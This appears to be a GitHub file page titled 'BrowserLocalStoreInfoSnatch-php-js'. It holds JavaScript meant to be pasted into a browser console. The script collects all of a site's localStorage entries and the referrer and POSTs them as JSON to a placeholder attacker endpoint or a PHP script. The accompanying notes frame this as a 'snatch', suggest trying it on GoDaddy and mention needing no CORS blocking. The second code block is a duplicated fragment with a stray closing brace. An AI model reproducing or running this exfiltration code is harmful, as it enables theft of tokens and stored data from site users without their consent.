-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathBrowserLocalStoreInfoSnatch-php-js
52 lines (39 loc) · 1.25 KB
/
BrowserLocalStoreInfoSnatch-php-js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
In order to display the current sites Local "Store" of the current site (try it on Godaddy)
Goto Inspect Element/ Console paste in this JS:
UPDATE:
function sendDataToServer() {
var storageObj = {};
for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
storageObj[key] = localStorage.getItem(key);
}
const data = {
referrer: document.referrer,
localStorage: storageObj
};
// Example of how to send the data to a server using fetch API
fetch('YOUR_SERVER_ENDPOINT_HERE', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
.then(response => response.json())
.then(data => console.log('Success:', data))
.catch((error) => console.error('Error:', error));
}
This is multipart - u need a php script on your server to read this and the site has to have no cors/origin policy blocking:
const data = {
referrer: document.referrer,
localStorage: storageObj
};
fetch('your_php_script.php', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
});
}
sendDataToServer();